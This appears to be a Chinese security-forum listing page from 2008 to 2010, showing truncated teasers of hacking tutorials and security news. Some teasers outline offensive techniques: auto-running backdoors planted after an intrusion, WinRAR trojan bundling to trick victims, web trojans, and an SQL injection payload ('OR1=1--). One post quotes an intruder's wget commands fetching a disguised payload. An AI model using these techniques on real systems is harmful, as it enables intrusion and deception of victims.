hackyours (海南) 高级Mysql攻击技术(翻译blackhat 2009文章)

发表于 2010-01-10

1.简介(文章中的堆查询其实就是联查)这个文章主要描述怎样再LAMP和WAMP平台上实施远程命令执行代码通过SQL注入漏洞。攻击者再Mysql平台上进行SQL注入必须处理一些限制和约束。例如,在一个不流行的平台中进行远程命令执行漏洞的一些查询语句缺乏复杂的声明,相对其他平台来说。再最近的这些年一些人开始仔细研究,这些人专注... ...全文

标签: mysql MYSQL Mysql MySQL 翻译 高级 技术 blackhat

hackyours (海南) 入侵网站后全自动安装后门条件，只要你有上传的权限。

发表于 2010-01-10

最近有朋友问我关于ASP.net服务器的入侵手段，在这里分享给大家吧。 1.ASP中常用的标准组件：FileSystemObject，这个组件为 ASP 提供了强大的文件系统访问能力，可以对服务器硬盘上的任何有权限的目录和文件进行读写、删除、改名等操作。FSO对象来自微软提供的脚本运行库scrrun.dll中。使用下面的代码就可以在... ...全文

标签: 后门 全自动 权限 条件

hackyours (海南) 入侵网站后如何全自动安装后门

发表于 2010-01-10

入侵网站后全自动安装后门条件，只要你有上传的权限。  一共三个文件  1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件）  思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。  第一文件带动运行第二文件。同时第二运行第三  运行完可正常进入C盘。不会让人发觉。并且里面... ...全文

标签: 后门 全自动

hackyours (海南) 详解cisco路由入侵艺术

发表于 2010-01-10 评论: 2 好评: 1

现在，是数字世界的天下。在喧闹的数字世界底层，存在一种精致的次序，这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是，路由器成了数据通信的交通亭，也成为了众多黑帽(Blackhat)争夺的目标之一。Cisco路由器占据这网络世界的绝对位置，于是安全焦点效应... ...全文

标签: cisco Cisco CISCO 路由 详解 艺术

mr-he 木马捆绑

发表于 2009-11-13 评论: 1

永远不会被杀木马捆绑机 捆绑机是玩马者常用的一个软件，用于将木马的服务端和其他文件捆绑在一起，欺骗对方运行。现在好多捆绑机都会被杀。现在介绍一款永远不会被杀的捆绑机--WinRAR。   　　WinRAR是网上常用的一个压缩/解压缩软件，支持包括zip在内的多种压缩格式，压缩率高，现在越来越多的人喜欢用Win... ...全文

标签: 捆绑 木马

皮娃娃 毕业论文离奇失踪 竟是神秘电脑病毒作怪

发表于 2009-06-02 评论: 2

眼下，高校2009届本科毕业生论文答辩工作已陆续启动。大四的小张近日备受毕业论文的“折磨”，临近答辩，一次杀毒后他却发现电脑里储存的万字论文消失了。经金山毒霸反病毒专家诊断发现，原来是伪文件夹U盘病毒在搞鬼。 最近一段时间，金山毒霸接到大量受害用户反映同一情况，其中一篇“救命啊，毕业论文被误杀了”的求... ...全文

妖界之箭 (江苏) phpass_crack(图)

发表于 2009-04-04 评论: 1

from:huaidan.org# Trace: 新版本的WordPress和phpbb已经弃用md5，采用phpass加密了（还有其他一些开源WEB程序）。原来DarkC0de上发布了一个phpass.py，是配合字典破解的，这个Phpass_Crack也是。PasswordsPro官方下载的最新版本也已经支持phpass的破解，有字典攻击和暴力破解等方式可选（选择md5(phpbb3) Modul）。 ha... ...全文

妖界之箭 (江苏) 当心你的手机中毒——手机病毒的剖析与防治(图)

发表于 2009-03-14 评论: 4

手机病毒是病毒的一个分支，虽然其存在只有短短数年，但在将来很可能会随着3G的推广而大量涌现。 　　病毒类型：手机病毒　　病毒目的：破坏手机系统，狂发短信等 　　手机病毒的始作俑者 　　我用手机的时间很长了，大概在上世纪90年代中后期就开始了。那个时候还没有手机病毒这个东东存在。为什么我敢这么肯定呢，... ...全文

LivePUB (江苏) 放个主机到外网，放了两天被黑两次

发表于 2008-12-12 评论: 8

第一次查到来源IP说是广西的，第二次是美国。 第一次把系统弄的彻底起不来，第二次把所有用户密码都改掉了... 幸好，还有一个会话从昨晚持续到现在，是root登录的，history查看到他们的动作： 576  wget nasuc.d.am/scan/neW.jpg   577  wget nasuc.do.am/scan/neW.jpg  ... ...全文

hnkdrory (广东) CC DDOS攻击器的原理及防范方法

发表于 2008-12-07 评论: 2

适合读者：DDOS研究员、各大站长、网络管理员　　前置知识：ASP基本阅读能力　　蝴蝶：前段时间上海一家游戏娱乐公司的网站遭到了基于页面请求的DDOS分布式拒绝服务攻击，网站陷入完全瘫痪状态，并被黑客的匿名信勒索，金额高达10万元，而在勒索过程中，这群黑客还表示会对腾讯QQ等网站下手，随后QQ“服务器维护”几天。... ...全文

天使不好 (北京) SQL注入葵花宝典

发表于 2008-10-18 评论: 1

 说明:本文分基础篇和高级篇基础篇重在一些基本的概念和步骤高级篇重在于一些技巧许多刚入门的小菜们可能会经常听到SQL注入这个词汇，但更多人的可能对SQL并不怎么了解，只是感觉是一种很神秘的黑客入侵手段，所以我就想系统的介绍和总结一下帮你揭开它的神秘面纱在写本文之前，我参阅了一些相关资料，下面就让我们... ...全文

标签: sql SQL 宝典

mssp299 (福建) SQL注入原理深度解析(2)

发表于 2008-09-17

四、构造SQL注射代码 为了成功地注入SQL命令，攻击者必须将开发人员的现有SQL命令转换成一个合法的SQL语句，当然，要盲注是有些难度的，但一般都是这样： 'OR1=1– 或者 ')OR1=1-- 此外，许多Web应用提供了带来错误报告和调试信息，例如，利用'OR1=1--对Web应用进行盲注时，经常看到如下所示的错误信息： Er... ...全文

标签: sql SQL 解析 深度 原理

mssp299 (福建) SQL注入原理深度解析(1)

发表于 2008-09-17 评论: 3

对于Web应用来说，注射式攻击由来已久，攻击方式也五花八门，常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例，在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理 注射式攻击的根源在于，程序命令和用户数据（即用户输入）之间没有做到泾渭分明。这使得攻击者有机会将... ...全文

标签: sql SQL 解析 深度 原理

qqmuma 网页木马的再发挥

发表于 2008-08-30

 大家对木马都不陌生了，它可能要算是计算机病毒史上最厉害的了，相信会使木马的人千千万万，但是有很多人苦于怎么把木马发给对方，现在随着计算机的普及，在网络上我相信很少有人会再轻易的接收对方的文件了，所以网页木马诞生了。 1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页... ...全文

标签: 木马 网页 发挥

钯博 (北京) 清华网站被黑 黑客批评现行教育制度

发表于 2008-08-25 评论: 11

清华大学网站被黑，黑客宣称现行的大学教育制度就是“在往学生们的脑子里灌屎”。黑客捏造了一篇清华大学校长顾秉林接受采访的新闻报道，批评现行教育制度：    顾秉林校长表示，在二十世纪初至40年代，可以说是中国教育界的黄金时期，在这段时间以内中国的大学为社会培养出了大批的优秀人才，他们中有伟大的思... ...全文

dragonfisher (山东) 效率超高 iPhone OS 2.0刚发布即遭破解(图)

发表于 2008-07-12 评论: 1

　　在iPhone 2.0软件发布之前，许多“疯友”就开始考虑一个问题：iPhone 2.0被破解需要多长时间?是一天?还是一周?或一个月?其实都不是，事实证明只需几个小时。 　　新的iPhone OS 2.0软件在发布后几个小时后，就已经惨遭被解锁的，命运，它已经被著名的iPhone Dev Team所破解。 　　或许你会奇怪，是黑客效率高还是... ...全文

标签: iphone 破解 效率 iPhone

dragonfisher (山东) 紧急升级！黑客借DNS漏洞控制网络

发表于 2008-07-09 评论: 2

　　据国外媒体报道，最近计算机行业的重量级人物正在加紧修复一个互联网底层的漏洞，该漏洞可以被黑客利用来控制互联网的流量。 　　主要软件商和硬件商已经悄悄在一起工作了几个月来修复这个问题，本周二它们终于为此发布了一个软件补丁。 　　Securosis的分析师Rich Mogul在一次媒体见面会上表示，“这是一个非常严... ...全文

标签: dns 黑客 漏洞 网络 DNS

钯博 (北京) 黑客袭卫星 通过其传输的数据已不安全（转）

发表于 2008-07-08 评论: 6

卫星并非什么新鲜事物：自1957年前苏联发射“人造地球卫星1号”(Sputnik 1)后，卫星就开始在地球轨道上运行，已有近半个世纪的历史。第一颗商业地球同步卫星于1965年发射升空，这种卫星与地球同步转动，相对静止于地球相同位置的上空，用于传输电话、电视和无线电信号，使人们能更好地相互保持联系。 但它们也并非无懈... ...全文

标签: 传输 黑客 数据 卫星

dragonfisher (山东) PIN码丢失 花旗银行客户被窃数百万美元

发表于 2008-07-07 评论: 1

　　据国外媒体报道，近日三名美国人被指控在发现了窃取花旗银行客户的Pin码后，从这些客户那儿窃取了数百万美元。 　　该黑客团伙在今年3月份被美国联邦调查局逮捕，他们入侵了一家自动提款机(ATM)处理公司，并收集了在7-Eleven连锁店使用的银行卡的Pin码。 　　这些自动提款机带有花旗银行的标志，但却是由7-Eleven连... ...全文

标签: PIN 被窃 花旗银行 客户

dragonfisher (山东) 四成web浏览器对黑客不设防

发表于 2008-07-03

　　你上网的时候使用的Web浏览器安全吗?近日来自Google、IBM和瑞士的Communications Systems Group的专家发布了一项调查报告，报告显示目前只有60%的Web用户在使用升级了安全补丁的浏览器。 　　据这些安全专家估计，在全球14亿互联网用户中只有5亿多用户使用了最安全的浏览器。这一数据来自2007年1月到今年上个月的Go... ...全文